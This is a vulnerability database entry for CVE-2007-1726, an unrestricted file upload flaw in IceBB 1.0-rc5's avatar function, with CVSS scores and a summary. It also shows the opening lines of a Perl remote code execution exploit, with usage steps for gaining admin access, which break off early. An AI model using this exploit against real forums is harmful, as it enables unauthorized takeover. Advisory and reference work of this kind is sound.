6.5
CVSSv2

CVE-2007-1726

Published: 28/03/2007 Updated: 19/10/2017
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 655
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

Unrestricted file upload vulnerability in index.php in IceBB 1.0-rc5 allows remote authenticated users to upload arbitrary files via the avatar function, which can later be accessed in uploads/.

Vulnerable Product Search on Vulmon Subscribe to Product

icebb icebb 1.0_rc_5

Exploits

#!/usr/bin/perl # IceBB 10-rc5 Remote Code Execution Exploit # 1 register a user # 2 run this exploit with this usage : $perl xplpl [host&path] [uname] [pass] # 3 login with admin access :) # # #### Coded & Discovered By Hessam-x / Hessamx-at-Hessamxnet use LWP::UserAgent; use HTTP::Cookies; $port = "80"; $host = $ARGV[0]; $un ...